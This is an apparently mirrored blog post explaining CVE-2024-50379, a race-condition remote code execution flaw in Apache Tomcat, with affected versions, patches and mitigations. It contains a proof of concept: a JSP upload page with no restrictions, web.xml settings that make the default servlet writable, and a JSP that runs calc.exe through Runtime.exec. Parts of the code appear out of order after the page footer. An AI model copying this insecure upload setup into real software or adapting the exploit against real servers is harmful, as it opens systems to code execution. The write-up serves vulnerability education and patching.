Deep Dive & POC of CVE-2024-50379 Exploit Tomcat Vulnerability (9.8 Severity)
quality 7/10 · good
0 net
AI Summary
CVE-2024-50379 is a critical TOCTOU race condition vulnerability in Apache Tomcat (CVSS 9.8) affecting JSP compilation that allows remote code execution on case-insensitive filesystems when the default servlet is misconfigured with write permissions. The article provides a complete POC demonstrating how attackers can upload a benign JSP file then overwrite it with malicious code using case-sensitivity tricks (file.jsp vs FILE.JSP on Windows).
Tags
Entities
CVE-2024-50379
Apache Tomcat
Vidhi Patel
OpenWall
Deep Dive & POC of CVE-2024-50379 Exploit Tomcat Vulnerability (9.8 Severity) | by Vidhi patel - Freedium
Milestone: 20GB Reached
We’ve reached 20GB of stored data — thank you for helping us grow!
Patreon
Ko-fi
Liberapay
Close
< Go to the original
Deep Dive & POC of CVE-2024-50379 Exploit Tomcat Vulnerability (9.8 Severity)
Introduction
Vidhi patel
Follow
~5 min read
·
December 25, 2024 (Updated: December 25, 2024)
·
Free: Yes
Introduction
In the ever-evolving landscape of cybersecurity, staying ahead of vulnerabilities is crucial for protecting sensitive systems. Recently, a critical security flaw — CVE-2024–50379 — was uncovered in Apache Tomcat, one of the most widely used web application servers globally. With a severity score of 9.8 , this vulnerability poses a significant risk, potentially allowing attackers to execute arbitrary code and compromise affected systems.
This blog dives deep into the technical details of CVE-2024–50379, offering insights into its root cause, the potential impact, and real-world exploit scenarios. To better understand its implications, we'll also walk through a Proof of Concept (POC) to demonstrate how attackers could exploit this flaw in unpatched systems.
By the end of this article, you'll not only gain a thorough understanding of the vulnerability but also learn how to safeguard your Tomcat deployments against this critical threat. Let's unravel the details and arm ourselves with the knowledge to stay secure.
CVE-2024–50379: Detailed Overview
Vulnerability Description
CVE-2024–50379 is a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability that occurs during JSP compilation in Apache Tomcat. This flaw permits a Remote Code Execution (RCE) on case-insensitive file systems under specific conditions.
To exploit this vulnerability, the default servlet must be enabled for write — a configuration that is not enabled by default. The issue affects the following Apache Tomcat versions:
11.0.0-M1 through 11.0.1
10.1.0-M1 through 10.1.33
9.0.0.M1 through 9.0.97
It is strongly recommended to upgrade to the fixed versions:
11.0.2
10.1.34
9.0.98
Severity Metrics
While this vulnerability is awaiting a full CVSS 4.0 Severity assessment , its potential for exploitation highlights the importance of addressing it immediately. The high severity score ( 9.8 ) underscores its criticality, particularly for systems with misconfigured settings.
Key References
Further details, including advisories and mitigation steps, can be found in the following resources:
OpenWall Security Advisory — 12/17/2024
OpenWall Security Advisory — 12/18/2024
Apache Tomcat Official Advisory
Proof of Concept (POC)
To demonstrate the exploitation of CVE-2024–50379, we create a controlled scenario involving:
Uploading a harmless JSP file to a Tomcat server.
Overwriting it with a malicious JSP file leveraging the TOCTOU race condition.
Since Windows has a case-insensitive file system, file.jsp and FILE.JSP are treated as the same file. Hence, the older file simply gets replaced when a new file is uploaded. In Linux, this wouldn't be the case as both file.jsp and FILE.JSP would be treated as two different files.
Disclaimer : This demonstration is for educational purposes only and should be performed in a secure, isolated lab environment. Never deploy such insecure configurations in production environments.
Set Up a JSP Webpage for File Upload
We create a simple JSP webpage ( upload.jsp ) that allows file uploads to the Tomcat server. <%@ page import="java.io.*, java.util.*" %>
<%@ page import="javax.servlet.http.Part" %>
File Upload
default
org.apache.catalina.servlets.DefaultServlet
readonly
false
fileEncoding
UTF-8
1
default
/uploads/*
FileUploadServlet
/upload.jsp
/tmp
5242880
10485760
1024
FileUploadServlet
/upload.jsp
listings
true
Unrestricted Uploads
/uploads/*
*
P.S.: This vulnerability can only be exploited if specific changes are made to the web.xml file configuration. By default, the readonly parameter in Tomcat's DefaultServlet is set to true , which prevents write operations. Exploitation becomes possible only if this parameter is explicitly set to false , allowing write access to the servlet. Always review and secure your server configurations to mitigate such risks.
Exploiting the Race Condition
Upload a Harmless JSP File
Upload a simple hello.jsp file containing: <% out.println("Hello, World!"); %>
Create a Malicious JSP File
Prepare a malicious JSP file ( HELLO.JSP ) to exploit the vulnerability: <%@ page import="java.io.*" %>
Hello World JSP
/uploads/hello.jsp to trigger the malicious JSP execution.
Outcome
The malicious JSP file is executed, and the calculator application opens on the server (if running on Windows).
This demonstrates a successful RCE exploitation of the race condition.
Mitigations and Takeaways
Secure File Uploads : Avoid allowing JSP file uploads directly to directories served by the application.
Upgrade Apache Tomcat : Ensure your Tomcat server is running a patched version (e.g., 11.0.2, 10.1.34, or 9.0.98).
Configuration Review : Disable write permissions for the Default Servlet.
Special thanks to Shaurya for quick help.
Thank you so much for helping me with framing the article & all the motivation behind !
#cve #tomcat #jsp
Reporting a Problem
Sometimes we have problems displaying some Medium posts.
If you have a problem that some images aren't loading - try using VPN. Probably you have problem with
access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).
Upload a JSP File
<% if ("POST".equalsIgnoreCase(request.getMethod())) { Part filePart = request.getPart("file"); String fileName = filePart.getSubmittedFileName(); String uploadPath = application.getRealPath("/") + "uploads/"; File uploadDir = new File(uploadPath); if (!uploadDir.exists()) uploadDir.mkdirs(); try (InputStream inputStream = filePart.getInputStream(); FileOutputStream outputStream = new FileOutputStream(uploadPath + fileName)) { byte[] buffer = new byte[1024]; int bytesRead; while ((bytesRead = inputStream.read(buffer)) != -1) { outputStream.write(buffer, 0, bytesRead); } out.println("File uploaded successfully to: " + uploadPath + fileName + "
"); } catch (Exception e) { out.println("Error uploading file: " + e.getMessage() + "
"); } } %> This JSP script: Accepts .jsp files for upload. Saves the uploaded files to the uploads/ directory in the server root. Changes in web.xml File To exploit CVE-2024–50379, modifications in the web.xml file can help enable the Default Servlet to process uploads with write permissions. This misconfiguration allows attackers to upload malicious files like FILE.JSP, which could replace existing files with unintended consequences. In a default setup, the Default Servlet typically does not allow write access. However, when configured with incorrect permissions, it allows files to be overwritten, making it susceptible to TOCTOU race conditions.Hello, World!
<% try { // Execute the command to open calc.exe Process process = Runtime.getRuntime().exec("cmd /c start calc.exe"); out.println("Calculator has been opened successfully (if the server is running on Windows).
"); } catch (Exception e) { out.println("Error while opening calculator: " + e.getMessage() + "
"); } %> This file will open the Windows calculator ( calc.exe ) upon execution. Overwrite the harmless hello.jsp with the malicious HELLO.JSP using a script. Trigger the Vulnerability Access http://localhost:8080/